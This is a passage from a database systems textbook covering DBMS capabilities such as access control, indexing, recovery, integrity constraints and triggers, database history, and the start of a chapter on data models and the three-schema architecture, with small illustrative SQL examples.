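  FOREIGN KEY (Student_number, Student_name)
  REFERENCES STUDENT (Student_number, Name);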

6.2 Restricting Unauthorized Access
When multiple users share a large database, it is likely that most users will not be
authorized to access all information in the database. For example, financial data is
often considered confidential, and only authorized persons are allowed to access
such data. In addition, some users may only be permitted to retrieve data, whereas
others are allowed to retrieve and update. Hence, the type of access operation—
retrieval or update—must also be controlled. Typically, users or user groups are
given account numbers protected by passwords, which they can use to gain access to
the database. A DBMS should provide a security and authorization subsystem,
which the DBA uses to create accounts and to specify account restrictions. Then, the
DBMS should enforce these restrictions automatically. Notice that we can apply
similar controls to the DBMS software. For example, only the DBA’s staff may be
allowed to use certain privileged software, such as the software for creating new
accounts. Similarly, parametric users may be allowed to access the database only
through the predefined canned transactions developed for their use.
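
In SQL, the DBA exercises this subsystem with statements such as GRANT and REVOKE.
A minimal sketch, with the account name invented for illustration:

-- The registration office may read and update grades, but only read student data
GRANT SELECT, UPDATE ON GRADE_REPORT TO registration_clerk;
GRANT SELECT ON STUDENT TO registration_clerk;

-- Withdraw the update privilege later if the job function changes
REVOKE UPDATE ON GRADE_REPORT FROM registration_clerk;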

6.3 Providing Persistent Storage for Program Objects
Databases can be used to provide persistent storage for program objects and data
structures. This is one of the main reasons for object-oriented database systems.
Programming languages typically have complex data structures, such as record
types in Pascal or class definitions in C++ or Java. The values of program variables
or objects are discarded once a program terminates, unless the programmer explic-
itly stores them in permanent files, which often involves converting these complex
structures into a format suitable for file storage. When the need arises to read
this data once more, the programmer must convert from the file format to the pro-
gram variable or object structure. Object-oriented database systems are compatible
with programming languages such as C++ and Java, and the DBMS software auto-
matically performs any necessary conversions. Hence, a complex object in C++ can
be stored permanently in an object-oriented DBMS. Such an object is said to be
persistent, since it survives the termination of program execution and can later be
directly retrieved by another C++ program.

The persistent storage of program objects and data structures is an important func-
tion of database systems. Traditional database systems often suffered from the so-
called impedance mismatch problem, since the data structures provided by the
DBMS were incompatible with the programming language’s data structures.
Object-oriented database systems typically offer data structure compatibility with
one or more object-oriented programming languages.

6.4 Providing Storage Structures and Search
Techniques for Efficient Query Processing

Database systems must provide capabilities for efficiently executing queries and
updates. Because the database is typically stored on disk, the DBMS must provide
specialized data structures and search techniques to speed up disk search for the
desired records. Auxiliary files called indexes are used for this purpose. Indexes are
typically based on tree data structures or hash data structures that are suitably mod-
ified for disk search. In order to process the database records needed by a particular
query, those records must be copied from disk to main memory. Therefore, the
DBMS often has a buffering or caching module that maintains parts of the data-
base in main memory buffers. In general, the operating system is responsible for
disk-to-memory buffering. However, because data buffering is crucial to the DBMS
performance, most DBMSs do their own data buffering.

The query processing and optimization module of the DBMS is responsible for
choosing an efficient query execution plan for each query based on the existing stor-
age structures. The choice of which indexes to create and maintain is part of physical
database design and tuning, which is one of the responsibilities of the DBA staff.
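
Creating an index is usually a single declarative statement, after which the query
optimizer decides when to use it; a sketch for the UNIVERSITY example (the index
name is an arbitrary choice):

-- Speed up retrieval of a student's grade records by student number
CREATE INDEX gr_student_idx ON GRADE_REPORT (Student_number);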

6.5 Providing Backup and Recovery
A DBMS must provide facilities for recovering from hardware or software failures.
The backup and recovery subsystem of the DBMS is responsible for recovery. For
example, if the computer system fails in the middle of a complex update transac-
tion, the recovery subsystem is responsible for making sure that the database is
restored to the state it was in before the transaction started executing. Alternatively,
the recovery subsystem could ensure that the transaction is resumed from the point
at which it was interrupted so that its full effect is recorded in the database. Disk
backup is also necessary in case of a catastrophic disk failure.

6.6 Providing Multiple User Interfaces
Because many types of users with varying levels of technical knowledge use a data-
base, a DBMS should provide a variety of user interfaces. These include query lan-
guages for casual users, programming language interfaces for application
programmers, forms and command codes for parametric users, and menu-driven
interfaces and natural language interfaces for standalone users. Both forms-style
interfaces and menu-driven interfaces are commonly known as graphical user
interfaces (GUIs). Many specialized languages and environments exist for specify-
ing GUIs. Capabilities for providing Web GUI interfaces to a database—or Web-
enabling a database—are also quite common.

6.7 Representing Complex Relationships among Data
A database may include numerous varieties of data that are interrelated in many
ways. Consider the example shown in Figure 2. The record for ‘Brown’ in the
STUDENT file is related to four records in the GRADE_REPORT file. Similarly, each
section record is related to one course record and to a number of GRADE_REPORT
records—one for each student who completed that section. A DBMS must have the
capability to represent a variety of complex relationships among the data, to define
new relationships as they arise, and to retrieve and update related data easily and
efficiently.

6.8 Enforcing Integrity Constraints
Most database applications have certain integrity constraints that must hold for
the data. A DBMS should provide capabilities for defining and enforcing these
constraints. The simplest type of integrity constraint involves specifying a data type for
each data item. For example, in Figure 3, we specified that the value of the Class data
item within each STUDENT record must be a one-digit integer and that the value of
Name must be a string of no more than 30 alphabetic characters. To restrict the
value of Class between 1 and 5 would be an additional constraint that is not shown
in the current catalog. A more complex type of constraint that frequently occurs
involves specifying that a record in one file must be related to records in other files.
For example, in Figure 2, we can specify that every section record must be related to a
course record. This is known as a referential integrity constraint. Another type of
constraint specifies uniqueness on data item values, such as every course record must
have a unique value for Course_number. This is known as a key or uniqueness con-
straint. These constraints are derived from the meaning or semantics of the data
and of the miniworld it represents. It is the responsibility of the database designers
to identify integrity constraints during database design. Some constraints can be
specified to the DBMS and automatically enforced. Other constraints may have to
be checked by update programs or at the time of data entry. For typical large appli-
cations, it is customary to call such constraints business rules.
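
Many of these constraints can be stated declaratively when the tables are defined, so
the DBMS enforces them automatically. A sketch for COURSE and SECTION, with
column sizes assumed rather than taken from the text:

CREATE TABLE COURSE (
    Course_name     VARCHAR(30),
    Course_number   VARCHAR(8) PRIMARY KEY,   -- key (uniqueness) constraint
    Credit_hours    INTEGER,
    Department      VARCHAR(4)
);

CREATE TABLE SECTION (
    Section_identifier   INTEGER PRIMARY KEY,
    Course_number        VARCHAR(8) NOT NULL
                           REFERENCES COURSE (Course_number),  -- referential integrity
    Semester             VARCHAR(10),
    Year                 INTEGER,
    Instructor           VARCHAR(30)
);

-- The additional constraint mentioned above: restrict Class in STUDENT to 1 through 5
ALTER TABLE STUDENT
  ADD CONSTRAINT class_range CHECK (Class BETWEEN 1 AND 5);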

A data item may be entered erroneously and still satisfy the specified integrity con-
straints. For example, if a student receives a grade of ‘A’ but a grade of ‘C’ is entered
in the database, the DBMS cannot discover this error automatically because ‘C’ is a
valid value for the Grade data type. Such data entry errors can only be discovered
manually (when the student receives the grade and complains) and corrected later
by updating the database. However, a grade of ‘Z’ would be rejected automatically
by the DBMS because ‘Z’ is not a valid value for the Grade data type. When we dis-
cuss each data model in subsequent chapters, we will introduce rules that pertain to
that model implicitly. For example, in the Entity-Relationship model, a relationship
must involve at least two entities. Such rules are inherent rules of the data model
and are automatically assumed to guarantee the validity of the model.

6.9 Permitting Inferencing and Actions Using Rules
Some database systems provide capabilities for defining deduction rules for
inferencing new information from the stored database facts. Such systems are called
deductive database systems. For example, there may be complex rules in the mini-
world application for determining when a student is on probation. These can be
specified declaratively as rules, which when compiled and maintained by the DBMS
can determine all students on probation. In a traditional DBMS, an explicit
procedural program code would have to be written to support such applications. But
if the miniworld rules change, it is generally more convenient to change the declared
deduction rules than to recode procedural programs. In today’s relational database
systems, it is possible to associate triggers with tables. A trigger is a form of a rule
activated by updates to the table, which results in performing some additional oper-
ations to some other tables, sending messages, and so on. More involved procedures
to enforce rules are popularly called stored procedures; they become a part of the
overall database definition and are invoked appropriately when certain conditions
are met. More powerful functionality is provided by active database systems, which
provide active rules that can automatically initiate actions when certain events and
conditions occur.
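
A trigger follows an event-condition-action pattern. The sketch below uses SQL-standard-
style trigger syntax, which varies considerably between products, and a hypothetical
ACADEMIC_STANDING table invented purely to illustrate the probation example:

CREATE TRIGGER flag_possible_probation
AFTER INSERT ON GRADE_REPORT
REFERENCING NEW ROW AS new_grade
FOR EACH ROW
WHEN (new_grade.Grade IN ('D', 'F'))
  -- action: mark the student's standing for review by the probation rule
  UPDATE ACADEMIC_STANDING
  SET    Needs_review = 'Y'
  WHERE  Student_number = new_grade.Student_number;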

6.10 Additional Implications of Using
the Database Approach

This section discusses some additional implications of using the database approach
that can benefit most organizations.

Potential for Enforcing Standards. The database approach permits the DBA to
define and enforce standards among database users in a large organization. This facil-
itates communication and cooperation among various departments, projects, and
users within the organization. Standards can be defined for names and formats of
data elements, display formats, report structures, terminology, and so on. The DBA
can enforce standards in a centralized database environment more easily than in an
environment where each user group has control of its own data files and software.

Reduced Application Development Time. A prime selling feature of the data-
base approach is that developing a new application—such as the retrieval of certain
data from the database for printing a new report—takes very little time. Designing
and implementing a large multiuser database from scratch may take more time than
writing a single specialized file application. However, once a database is up and run-
ning, substantially less time is generally required to create new applications using
DBMS facilities. Development time using a DBMS is estimated to be one-sixth to
one-fourth of that for a traditional file system.

Flexibility. It may be necessary to change the structure of a database as require-
ments change. For example, a new user group may emerge that needs information
not currently in the database. In response, it may be necessary to add a file to the
database or to extend the data elements in an existing file. Modern DBMSs allow
certain types of evolutionary changes to the structure of the database without
affecting the stored data and the existing application programs.

Availability of Up-to-Date Information. A DBMS makes the database available
to all users. As soon as one user’s update is applied to the database, all other users
can immediately see this update. This availability of up-to-date information is
essential for many transaction-processing applications, such as reservation systems
or banking databases, and it is made possible by the concurrency control and recov-
ery subsystems of a DBMS.

Economies of Scale. The DBMS approach permits consolidation of data and
applications, thus reducing the amount of wasteful overlap between activities of
data-processing personnel in different projects or departments as well as redundan-
cies among applications. This enables the whole organization to invest in more
powerful processors, storage devices, or communication gear, rather than having
each department purchase its own (lower performance) equipment. This reduces
overall costs of operation and management.

7 A Brief History of Database Applications
We now give a brief historical overview of the applications that use DBMSs and how
these applications provided the impetus for new types of database systems.

7.1 Early Database Applications Using Hierarchical
and Network Systems

Many early database applications maintained records in large organizations such as
corporations, universities, hospitals, and banks. In many of these applications, there
were large numbers of records of similar structure. For example, in a university
application, similar information would be kept for each student, each course, each
grade record, and so on. There were also many types of records and many interrela-
tionships among them.

One of the main problems with early database systems was the intermixing of con-
ceptual relationships with the physical storage and placement of records on disk.
Hence, these systems did not provide sufficient data abstraction and program-data
independence capabilities. For example, the grade records of a particular student
could be physically stored next to the student record. Although this provided very
efficient access for the original queries and transactions that the database was
designed to handle, it did not provide enough flexibility to access records efficiently
when new queries and transactions were identified. In particular, new queries that
required a different storage organization for efficient processing were quite difficult
to implement efficiently. It was also laborious to reorganize the database when
changes were made to the application’s requirements.

Another shortcoming of early systems was that they provided only programming
language interfaces. This made it time-consuming and expensive to implement new
queries and transactions, since new programs had to be written, tested, and
debugged. Most of these database systems were implemented on large and expensive
mainframe computers starting in the mid-1960s and continuing through the 1970s
and 1980s. The main types of early systems were based on three main paradigms:
hierarchical systems, network model based systems, and inverted file systems.

7.2 Providing Data Abstraction and Application
Flexibility with Relational Databases

Relational databases were originally proposed to separate the physical storage of
data from its conceptual representation and to provide a mathematical foundation
for data representation and querying. The relational data model also introduced
high-level query languages that provided an alternative to programming language
interfaces, making it much faster to write new queries. Relational representation of
data somewhat resembles the example we presented in Figure 2. Relational systems
were initially targeted to the same applications as earlier systems, and provided flex-
ibility to develop new queries quickly and to reorganize the database as require-
ments changed. Hence, data abstraction and program-data independence were much
improved when compared to earlier systems.

Early experimental relational systems developed in the late 1970s and the commer-
cial relational database management systems (RDBMS) introduced in the early
1980s were quite slow, since they did not use physical storage pointers or record
placement to access related data records. With the development of new storage and
indexing techniques and better query processing and optimization, their perfor-
mance improved. Eventually, relational databases became the dominant type of data-
base system for traditional database applications. Relational databases now exist on
almost all types of computers, from small personal computers to large servers.

7.3 Object-Oriented Applications and the Need
for More Complex Databases

The emergence of object-oriented programming languages in the 1980s and the
need to store and share complex, structured objects led to the development of
object-oriented databases (OODBs). Initially, OODBs were considered a competi-
tor to relational databases, since they provided more general data structures. They
also incorporated many of the useful object-oriented paradigms, such as abstract
data types, encapsulation of operations, inheritance, and object identity. However,
the complexity of the model and the lack of an early standard contributed to their
limited use. They are now mainly used in specialized applications, such as engineer-
ing design, multimedia publishing, and manufacturing systems. Despite expectations
that they would make a big impact, their overall penetration into the database
products market remains under 5% today. In addition, many object-oriented con-
cepts were incorporated into the newer versions of relational DBMSs, leading to
object-relational database management systems, known as ORDBMSs.

7.4 Interchanging Data on the Web
for E-Commerce Using XML

The World Wide Web provides a large network of interconnected computers. Users
can create documents using a Web publishing language, such as HyperText Markup
Language (HTML), and store these documents on Web servers where other users
(clients) can access them. Documents can be linked through hyperlinks, which are
pointers to other documents. In the 1990s, electronic commerce (e-commerce)
emerged as a major application on the Web. It quickly became apparent that parts of
the information on e-commerce Web pages were often dynamically extracted data
from DBMSs. A variety of techniques were developed to allow the interchange of
data on the Web. Currently, eXtensible Markup Language (XML) is considered to be
the primary standard for interchanging data among various types of databases and
Web pages. XML combines concepts from the models used in document systems
with database modeling concepts.

7.5 Extending Database Capabilities for New Applications
The success of database systems in traditional applications encouraged developers
of other types of applications to attempt to use them. Such applications tradition-
ally used their own specialized file and data structures. Database systems now offer
extensions to better support the specialized requirements for some of these applica-
tions. The following are some examples of these applications:

■ Scientific applications that store large amounts of data resulting from scien-
tific experiments in areas such as high-energy physics, the mapping of the
human genome, and the discovery of protein structures.

■ Storage and retrieval of images, including scanned news or personal photo-
graphs, satellite photographic images, and images from medical procedures
such as x-rays and MRIs (magnetic resonance imaging).

■ Storage and retrieval of videos, such as movies, and video clips from news
or personal digital cameras.

■ Data mining applications that analyze large amounts of data searching for
the occurrences of specific patterns or relationships, and for identifying
unusual patterns in areas such as credit card usage.

■ Spatial applications that store spatial locations of data, such as weather
information, maps used in geographical information systems, and in auto-
mobile navigational systems.

■ Time series applications that store information such as economic data at
regular points in time, such as daily sales and monthly gross national prod-
uct figures.

It was quickly apparent that basic relational systems were not very suitable for many
of these applications, usually for one or more of the following reasons:

■ More complex data structures were needed for modeling the application
than the simple relational representation.

■ New data types were needed in addition to the basic numeric and character
string types.

■ New operations and query language constructs were necessary to manipu-
late the new data types.

■ New storage and indexing structures were needed for efficient searching on
the new data types.

This led DBMS developers to add functionality to their systems. Some functionality
was general purpose, such as incorporating concepts from object-oriented data-
bases into relational systems. Other functionality was special purpose, in the form
of optional modules that could be used for specific applications. For example, users
could buy a time series module to use with their relational DBMS for their time
series application.

Many large organizations use a variety of software application packages that work
closely with database back-ends. The database back-end represents one or more
databases, possibly from different vendors and using different data models, that
maintain data that is manipulated by these packages for supporting transactions,
generating reports, and answering ad-hoc queries. One of the most commonly used
types of systems is Enterprise Resource Planning (ERP), which is used to consolidate
a variety of functional areas within an organization, including production, sales,
distribution, marketing, finance, human resources, and so on. Another popular type
of system is Customer Relationship Management (CRM) software that spans order
processing as well as marketing and customer support functions. These applications
are Web-enabled in that internal and external users are given a variety of Web-
portal interfaces to interact with the back-end databases.

7.6 Databases versus Information Retrieval
Traditionally, database technology applies to structured and formatted data that
arises in routine applications in government, business, and industry. Database tech-
nology is heavily used in manufacturing, retail, banking, insurance, finance, and
health care industries, where structured data is collected through forms, such as
invoices or patient registration documents. An area related to database technology is
Information Retrieval (IR), which deals with books, manuscripts, and various
forms of library-based articles. Data is indexed, cataloged, and annotated using key-
words. IR is concerned with searching for material based on these keywords, and
with the many problems dealing with document processing and free-form text pro-
cessing. There has been a considerable amount of work done on searching for text
based on keywords, finding documents and ranking them based on relevance, auto-
matic text categorization, classification of text documents by topics, and so on. With
the advent of the Web and the proliferation of HTML pages running into the bil-
lions, there is a need to apply many of the IR techniques to processing data on the
Web. Data on Web pages typically contains images, text, and objects that are active
and change dynamically. Retrieval of information on the Web is a new problem that
requires techniques from databases and IR to be applied in a variety of novel com-
binations.

8 When Not to Use a DBMS
In spite of the advantages of using a DBMS, there are a few situations in which a
DBMS may involve unnecessary overhead costs that would not be incurred in tradi-
tional file processing. The overhead costs of using a DBMS are due to the following:

■ High initial investment in hardware, software, and training

■ The generality that a DBMS provides for defining and processing data

■ Overhead for providing security, concurrency control, recovery, and
integrity functions

Therefore, it may be more desirable to use regular files under the following circum-
stances:

■ Simple, well-defined database applications that are not expected to change at
all

■ Stringent, real-time requirements for some application programs that may
not be met because of DBMS overhead

■ Embedded systems with limited storage capacity, where a general-purpose
DBMS would not fit

■ No multiple-user access to data

Certain industries and applications have elected not to use general-purpose
DBMSs. For example, many computer-aided design (CAD) tools used by mechani-
cal and civil engineers have proprietary file and data management software that is
geared for the internal manipulations of drawings and 3D objects. Similarly, com-
munication and switching systems designed by companies like AT&T were early
manifestations of database software that was made to run very fast with hierarchi-
cally organized data for quick access and routing of calls. Similarly, GIS implementations
often use their own data organization schemes to efficiently support functions related
to processing maps, physical contours, lines, polygons, and so on. For such specialized
purposes, general-purpose DBMSs can be inadequate.

9 Summary
In this chapter we defined a database as a collection of related data, where data
means recorded facts. A typical database represents some aspect of the real world
and is used for specific purposes by one or more groups of users. A DBMS is a gen-
eralized software package for implementing and maintaining a computerized data-
base. The database and software together form a database system. We identified
several characteristics that distinguish the database approach from traditional file-
processing applications, and we discussed the main categories of database users, or
the actors on the scene. We noted that in addition to database users, there are several
categories of support personnel, or workers behind the scene, in a database environ-
ment.

We presented a list of capabilities that should be provided by the DBMS software to
the DBA, database designers, and end users to help them design, administer, and use
a database. Then we gave a brief historical perspective on the evolution of database
applications. We pointed out the marriage of database technology with information
retrieval technology, which will play an important role due to the popularity of the
Web. Finally, we discussed the overhead costs of using a DBMS and discussed some
situations in which it may not be advantageous to use one.

Review Questions
1. Define the following terms: data, database, DBMS, database system, database
catalog, program-data independence, user view, DBA, end user, canned trans-
action, deductive database system, persistent object, meta-data, and
transaction-processing application.

2. What four main types of actions involve databases? Briefly discuss each.

3. Discuss the main characteristics of the database approach and how it differs
from traditional file systems.

4. What are the responsibilities of the DBA and the database designers?

5. What are the different types of database end users? Discuss the main activi-
ties of each.

6. Discuss the capabilities that should be provided by a DBMS.

7. Discuss the differences between database systems and information retrieval
systems.

Exercises
8. Identify some informal queries and update operations that you would expect
to apply to the database shown in Figure 2.

9. What is the difference between controlled and uncontrolled redundancy?
Illustrate with examples.

10. Specify all the relationships among the records of the database shown in
Figure 2.

11. Give some additional views that may be needed by other user groups for the
database shown in Figure 2.

12. Cite some examples of integrity constraints that you think can apply to the
database shown in Figure 2.

13. Give examples of systems in which it may make sense to use traditional file
processing instead of a database approach.

14. Consider Figure 2.

a. If the name of the ‘CS’ (Computer Science) Department changes to
‘CSSE’ (Computer Science and Software Engineering) Department and
the corresponding prefix for the course number also changes, identify the
columns in the database that would need to be updated.

b. Can you restructure the columns in the COURSE, SECTION, and
PREREQUISITE tables so that only one column will need to be updated?

Selected Bibliography
The October 1991 issue of Communications of the ACM and Kim (1995) include
several articles describing next-generation DBMSs; many of the database features
discussed in the former are now commercially available. The March 1976 issue of
ACM Computing Surveys offers an early introduction to database systems and may
provide a historical perspective for the interested reader.

Database System Concepts
and Architecture

The architecture of DBMS (database management system) packages has evolved from the early monolithic
systems, where the whole DBMS software package was one tightly integrated system,
to the modern DBMS packages that are modular in design, with a client/server sys-
tem architecture. This evolution mirrors the trends in computing, where large cen-
tralized mainframe computers are being replaced by hundreds of distributed
workstations and personal computers connected via communications networks to
various types of server machines—Web servers, database servers, file servers, applica-
tion servers, and so on.

In a basic client/server DBMS architecture, the system functionality is distributed
between two types of modules.1 A client module is typically designed so that it will
run on a user workstation or personal computer. Typically, application programs
and user interfaces that access the database run in the client module. Hence, the
client module handles user interaction and provides the user-friendly interfaces
such as forms- or menu-based GUIs (graphical user interfaces). The other kind of
module, called a server module, typically handles data storage, access, search, and
other functions. We discuss client/server architectures in more detail in Section 5.
First, we must study more basic concepts that will give us a better understanding of
modern database architectures.

In this chapter we present the terminology and basic concepts. Section 1 discusses
data models and defines the concepts of schemas and instances, which are funda-
mental to the study of database systems. Then, we discuss the three-schema DBMS
architecture and data independence in Section 2; this provides a user’s perspective
on what a DBMS is supposed to do. In Section 3 we describe the types of interfaces
and languages that are typically provided by a DBMS. Section 4 discusses the data-
base system software environment. Section 5 gives an overview of various types of

1As we shall see in Section 5, there are variations on this simple two-tier client/server architecture.

From Chapter 2 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.

client/server architectures. Finally, Section 6 presents a classification of the types of
DBMS packages. Section 7 summarizes the chapter.

The material in Sections 4 through 6 provides more detailed concepts that may be
considered as supplementary to the basic introductory material.

1 Data Models, Schemas, and Instances
One fundamental characteristic of the database approach is that it provides some
level of data abstraction. Data abstraction generally refers to the suppression of
details of data organization and storage, and the highlighting of the essential fea-
tures for an improved understanding of data. One of the main characteristics of the
database approach is to support data abstraction so that different users can perceive
data at their preferred level of detail. A data model—a collection of concepts that
can be used to describe the structure of a database—provides the necessary means
to achieve this abstraction.2 By structure of a database we mean the data types, rela-
tionships, and constraints that apply to the data. Most data models also include a set
of basic operations for specifying retrievals and updates on the database.

In addition to the basic operations provided by the data model, it is becoming more
common to include concepts in the data model to specify the dynamic aspect or
behavior of a database application. This allows the database designer to specify a set
of valid user-defined operations that are allowed on the database objects.3 An exam-
ple of a user-defined operation could be COMPUTE_GPA, which can be applied to a
STUDENT object. On the other hand, generic operations to insert, delete, modify, or
retrieve any kind of object are often included in the basic data model operations.
Concepts to specify behavior are fundamental to object-oriented data models but
are also being incorporated in more traditional data models. For example, object-
relational models extend the basic relational model to include such concepts,
among others. In the basic relational data model, there is a provision to attach
behavior to the relations in the form of persistent stored modules, popularly known
as stored procedures.
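
For instance, a COMPUTE_GPA-style operation could be attached to the database as a persistent stored module. The following is only a sketch in SQL/PSM-style syntax; the Grade_points and Credit_hours columns of GRADE_REPORT, and the function itself, are assumptions introduced for illustration:

    -- Hypothetical stored function: returns one student's grade point average.
    -- Assumes GRADE_REPORT(Student_number, Grade_points, Credit_hours).
    CREATE FUNCTION COMPUTE_GPA (stno INT)
    RETURNS DECIMAL(3,2)
    READS SQL DATA
    RETURN (SELECT SUM(Grade_points * Credit_hours) / SUM(Credit_hours)
            FROM   GRADE_REPORT
            WHERE  Student_number = stno);
    -- Possible use: SELECT Name, COMPUTE_GPA(Student_number) FROM STUDENT;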

1.1 Categories of Data Models
Many data models have been proposed, which we can categorize according to the
types of concepts they use to describe the database structure. High-level or
conceptual data models provide concepts that are close to the way many users per-
ceive data, whereas low-level or physical data models provide concepts that
describe the details of how data is stored on the computer storage media, typically

2Sometimes the word model is used to denote a specific database description, or schema—for example,
the marketing data model. We will not use this interpretation.
3The inclusion of concepts to describe behavior reflects a trend whereby database design and software
design activities are increasingly being combined into a single activity. Traditionally, specifying behavior is
associated with software design.

magnetic disks. Concepts provided by low-level data models are generally meant for
computer specialists, not for end users. Between these two extremes is a class of
representational (or implementation) data models,4 which provide concepts that
may be easily understood by end users but that are not too far removed from the
way data is organized in computer storage. Representational data models hide many
details of data storage on disk but can be implemented on a computer system
directly.

Conceptual data models use concepts such as entities, attributes, and relationships.
An entity represents a real-world object or concept, such as an employee or a project
from the miniworld that is described in the database. An attribute represents some
property of interest that further describes an entity, such as the employee’s name or
salary. A relationship among two or more entities represents an association among
the entities, for example, a works-on relationship between an employee and a proj-
ect. The Entity-Relationship model is a popular high-level conceptual data model,
and there are additional abstractions used for advanced modeling, such as general-
ization, specialization, and categories (union types).

Representational or implementation data models are the models used most fre-
quently in traditional commercial DBMSs. These include the widely used relational
data model, as well as the so-called legacy data models—the network and
hierarchical models—that have been widely used in the past. The SQL language
set the standard for relational databases. Representational data models represent
data by using record structures and hence are sometimes called record-based data
models.

We can regard the object data model as an example of a new family of higher-level
implementation data models that are closer to conceptual data models. A standard
for object databases called the ODMG object model has been proposed by the
Object Data Management Group (ODMG). Object data models are also frequently
utilized as high-level conceptual models, particularly in the software engineering
domain.

Physical data models describe how data is stored as files in the computer by repre-
senting information such as record formats, record orderings, and access paths. An
access path is a structure that makes the search for particular database records effi-
cient. An index is an example of an access path that allows direct access to data
using an index term or a keyword. It may be organized in a linear, hierarchical (tree-
structured), or some other fashion.

4The term implementation data model is not a standard term; we have introduced it to refer to the avail-
able data models in commercial database systems.

1.2 Schemas, Instances, and Database State
In any data model, it is important to distinguish between the description of the data-
base and the database itself. The description of a database is called the database
schema, which is specified during database design and is not expected to change
frequently.5 Most data models have certain conventions for displaying schemas as
diagrams.6 A displayed schema is called a schema diagram. Figure 1 shows a
schema diagram for the database shown in Figure A.1 (at the end of this chapter in
Appendix: Figure); the diagram displays the structure of each record type but not
the actual instances of records. We call each object in the schema—such as STU-
DENT or COURSE—a schema construct.

A schema diagram displays only some aspects of a schema, such as the names of
record types and data items, and some types of constraints. Other aspects are not
specified in the schema diagram; for example, Figure 1 shows neither the data type
of each data item, nor the relationships among the various files. Many types of con-
straints are not represented in schema diagrams. A constraint such as students
majoring in computer science must take CS1310 before the end of their sophomore year
is quite difficult to represent diagrammatically.
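
To make the idea of schema constructs concrete, here is a hedged sketch of how two of the record types from Figure 1 might be declared as SQL tables. The data types, keys, and the CHECK constraint are illustrative assumptions, since the schema diagram itself does not specify them:

    -- Illustrative SQL DDL for part of the Figure 1 schema.
    CREATE TABLE STUDENT (
      Name            VARCHAR(50),
      Student_number  INT PRIMARY KEY,
      Class           INT,
      Major           VARCHAR(4)
    );

    CREATE TABLE COURSE (
      Course_name     VARCHAR(60),
      Course_number   VARCHAR(10) PRIMARY KEY,
      Credit_hours    INT CHECK (Credit_hours > 0),  -- a simple constraint the diagram omits
      Department      VARCHAR(4)
    );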

The actual data in a database may change quite frequently. For example, the data-
base shown in Figure A.1 changes every time we add a new student or enter a new
grade. The data in the database at a particular moment in time is called a database

Figure 1
Schema diagram for the database in Figure A.1, showing the record types and their data items:
STUDENT (Name, Student_number, Class, Major); COURSE (Course_name, Course_number,
Credit_hours, Department); SECTION (Section_identifier, Course_number, Semester, Year,
Instructor); GRADE_REPORT (Student_number, Section_identifier, Grade); and
PREREQUISITE (Course_number, Prerequisite_number).

5Schema changes are usually needed as the requirements of the database applications change. Newer
database systems include operations for allowing schema changes, although the schema change
process is more involved than simple database updates.
6It is customary in database parlance to use schemas as the plural for schema, even though schemata is
the proper plural form. The word scheme is also sometimes used to refer to a schema.

state or snapshot. It is also called the current set of occurrences or instances in the
database. In a given database state, each schema construct has its own current set of
instances; for example, the STUDENT construct will contain the set of individual
student entities (records) as its instances. Many database states can be constructed
to correspond to a particular database schema. Every time we insert or delete a
record or change the value of a data item in a record, we change one state of the
database into another state.
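
For example, a single insertion changes the database state. Assuming the STUDENT table sketched earlier, the following statement moves the database from one state to the next without touching the schema:

    -- Inserting one record changes the database state, not the schema.
    INSERT INTO STUDENT (Name, Student_number, Class, Major)
    VALUES ('Smith', 17, 1, 'CS');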

The distinction between database schema and database state is very important.
When we define a new database, we specify its database schema only to the DBMS.
At this point, the corresponding database state is the empty state with no data. We
get the initial state of the database when the database is first populated or loaded
with the initial data. From then on, every time an update operation is applied to the
database, we get another database state. At any point in time, the database has a
current state.7 The DBMS is partly responsible for ensuring that every state of the
database is a valid state—that is, a state that satisfies the structure and constraints
specified in the schema. Hence, specifying a correct schema to the DBMS is
extremely important and the schema must be designed with utmost care. The
DBMS stores the descriptions of the schema constructs and constraints—also called
the meta-data—in the DBMS catalog so that DBMS software can refer to the
schema whenever it needs to. The schema is sometimes called the intension, and a
database state is called an extension of the schema.

Although, as mentioned earlier, the schema is not supposed to change frequently, it
is not uncommon that changes occasionally need to be applied to the schema as the
application requirements change. For example, we may decide that another data
item needs to be stored for each record in a file, such as adding the Date_of_birth to
the STUDENT schema in Figure 1. This is known as schema evolution. Most mod-
ern DBMSs include some operations for schema evolution that can be applied while
the database is operational.
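
The Date_of_birth example above might be applied with a single DDL statement while the database remains available; the DATE type shown here is an assumption:

    -- Schema evolution: add a new data item to an existing record type.
    ALTER TABLE STUDENT ADD Date_of_birth DATE;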

2 Three-Schema Architecture
and Data Independence

Three of the four important characteristics of the database approach are (1) use of
a catalog to store the database description (schema) so as to make it self-describing,
(2) insulation of programs and data (program-data and program-operation inde-
pendence), and (3) support of multiple user views. In this section we specify an
architecture for database systems, called the three-schema architecture,8 that was
proposed to help achieve and visualize these characteristics. Then we discuss the
concept of data independence further.

7The current state is also called the current snapshot of the database. It has also been called a database
instance, but we prefer to use the term instance to refer to individual records.
8This is also known as the ANSI/SPARC architecture, after the committee that proposed it (Tsichritzis
and Klug 1978).

Figure 2
The three-schema architecture. End users interact with external views at the external level;
the external/conceptual mapping relates each external view to the conceptual schema at the
conceptual level, and the conceptual/internal mapping relates the conceptual schema to the
internal schema at the internal level, which describes the stored database.

2.1 The Three-Schema Architecture
The goal of the three-schema architecture, illustrated in Figure 2, is to separate the
user applications from the physical database. In this architecture, schemas can be
defined at the following three levels:

1. The internal level has an internal schema, which describes the physical stor-
age structure of the database. The internal schema uses a physical data model
and describes the complete details of data storage and access paths for the
database.

2. The conceptual level has a conceptual schema, which describes the struc-
ture of the whole database for a community of users. The conceptual schema
hides the details of physical storage structures and concentrates on describ-
ing entities, data types, relationships, user operations, and constraints.
Usually, a representational data model is used to describe the conceptual
schema when a database system is implemented. This implementation con-
ceptual schema is often based on a conceptual schema design in a high-level
data model.

3. The external or view level includes a number of external schemas or user
views. Each external schema describes the part of the database that a partic-
ular user group is interested in and hides the rest of the database from that
user group. As in the previous level, each external schema is typically imple-
mented using a representational data model, possibly based on an external
schema design in a high-level data model.

The three-schema architecture is a convenient tool with which the user can visualize
the schema levels in a database system. Most DBMSs do not separate the three levels
completely and explicitly, but support the three-schema architecture to some extent.
Some older DBMSs may include physical-level details in the conceptual schema.
The three-level ANSI architecture has an important place in database technology
development because it clearly separates the users’ external level, the database’s con-
ceptual level, and the internal storage level for designing a database. It is very much
applicable in the design of DBMSs, even today. In most DBMSs that support user
views, external schemas are specified in the same data model that describes the
conceptual-level information (for example, a relational DBMS like Oracle uses SQL
for this). Some DBMSs allow different data models to be used at the conceptual and
external levels. An example is Universal Data Base (UDB), a DBMS from IBM,
